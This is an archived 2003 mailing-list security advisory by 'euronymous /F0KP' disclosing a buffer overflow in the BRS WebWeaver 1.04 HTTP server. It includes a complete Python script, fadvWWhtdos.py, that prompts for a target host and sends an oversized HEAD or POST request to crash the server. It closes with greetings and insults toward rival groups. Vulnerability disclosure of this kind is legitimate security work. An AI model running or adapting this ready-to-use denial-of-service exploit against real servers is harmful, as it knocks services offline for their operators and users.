=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: BRS WebWeaver: POST and HEAD Overflaws product: BRS WebWeaver v1.04 and prior [ i guess ] vendor: www.brswebweaver.com risk: high date: 05/25/2k3 tested platform: Windows 98 Second Edition discovered by: euronymous /F0KP advisory urls: http://f0kp.iplus.ru/bz/025.en.txt http://f0kp.iplus.ru/bz/025.ru.txt contact email: euronymousat_private =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= description ----------- more b0fs in Webweaver. sending 32700 charz in POST or HEAD request will crash http server. when send 32699 charz with fadvWWhtdos.py, webweaver print 403 error. when sending >= 32700 charz, server will print `Unable to insert string' error and you have to restart it. }------- start of fadvWWhtdos.py ---------------{ #! /usr/bin/env python ### # WebWeaver 1.04 Http Server DoS exploit # by euronymous /f0kp [http://f0kp.iplus.ru] ######## # Usage: ./fadvWWhtdos.py ######## import sys import httplib met = raw_input(""" What kind request you want make to crash webweaver?? [ HEAD/POST ]: """) target = raw_input("Type your target hostname [ w/o http:// ]: ") spl = "f0kp"*0x1FEF conn = httplib.HTTPConnection(target) conn.request(met, "/"+spl) r1 = conn.getresponse() print r1.status }--------- end of fadvWWhtdos.py ---------------{ shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru, N0b0d13s Team and all russian security guyz!! to kate especially )) hates: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb lamers team == yeah, i really __HATE__ yours!! ================ im not a lame, not yet a hacker ================
This archive was generated by hypermail 2b30 : Tue May 27 2003 - 11:45:47 PDT